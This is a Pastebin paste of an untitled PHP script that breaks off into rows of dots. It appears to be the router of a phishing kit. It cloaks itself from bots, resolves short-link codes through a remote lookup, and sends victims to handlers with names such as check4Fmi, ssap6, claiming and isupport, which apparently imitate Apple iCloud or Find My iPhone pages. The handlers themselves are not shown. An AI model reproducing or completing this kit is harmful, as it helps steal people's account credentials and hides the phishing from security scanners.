Advertisement
Guest User

Untitled

a guest
Aug 11th, 2023
44
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
  1. <?php
  2.  
  3. include 'antibots.php';
  4.  
  5. if (false === stripos($_SERVER['HTTP_USER_AGENT'], 'bot')) {
  6. $iuri = $_SERVER['REQUEST_URI'];
  7.  
  8. include 'licence.php';
  9.  
  10. include 'allinone/folder.php';
  11.  
  12. if (8 == strlen($iuri)) {
  13. $iuri = str_replace('/', '', $iuri);
  14. $url = "$short/getlink.php?sub=$iuri";
  15. $url = checkme($url);
  16. $bits = parse_url($url);
  17. $scri = basename($bits['path']);
  18.  
  19. if ('empty' != $url) {
  20. $id = substr($url, strrpos($url, '?') + 1);
  21. $last = explode('=', $id, 2);
  22. $authi = $last[0];
  23. $order = $last[1];
  24.  
  25. if ('ID' == $authi) {
  26. $auth = '';
  27. $ID = $order;
  28. } else {
  29. $auth = $order;
  30. $ID = '';
  31. }
  32.  
  33. if ('check' == $scri) {
  34. check2022($ID, $auth, $tokenid);
  35. }
  36.  
  37. if ('check23' == $scri) {
  38. check6($ID, $auth, $tokenid);
  39. }
  40.  
  41. if ('checkfmi23' == $scri) {
  42. check6Fmi($ID, $auth, $tokenid);
  43. } else if ('check4' == $scri) {
  44. check4($ID, $auth, $tokenid);
  45. } else if ('check4iC' == $scri) {
  46. check4iC($ID, $auth, $tokenid);
  47. } else if ('check4Fmi' == $scri) {
  48. check4Fmi($ID, $auth, $tokenid);
  49. } else if ('fimi' == $scri) {
  50. dual6($ID, $auth, $tokenid);
  51. } else if ('fimivrf' == $scri) {
  52. dual4($ID, $auth, $tokenid);
  53. } else if ('support' == $scri) {
  54. support($ID, $auth, $tokenid);
  55. } else if ('isupport' == $scri) {
  56. isupport($ID, $auth, $tokenid);
  57. } else if ('ssap6' == $scri) {
  58. ssap6($ID, $auth, $tokenid);
  59. } else if ('claiming' == $scri) {
  60. claimit($ID, $auth, $tokenid);
  61. } else if ('sharing' == $scri) {
  62. share($ID, $auth, $tokenid);
  63. } else if ('check6st' == $scri) {
  64. check6st($ID, $auth, $tokenid);
  65. } else if ('check4st' == $scri) {
  66. check4st($ID, $auth, $tokenid);
  67. } else if ('share23' == $scri) {
  68. checkPHOTO($ID, $auth, $tokenid);
  69. } else if ('Idapp' == $scri) {
  70. Idapp($ID, $auth, $tokenid);
  71. } else if ('ssap4' == $scri) {
  72. ssap4($ID, $auth, $tokenid);
  73. } else if ('map' == $scri) {
  74. ............................................................................
  75. ............................................
  76. .....................
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement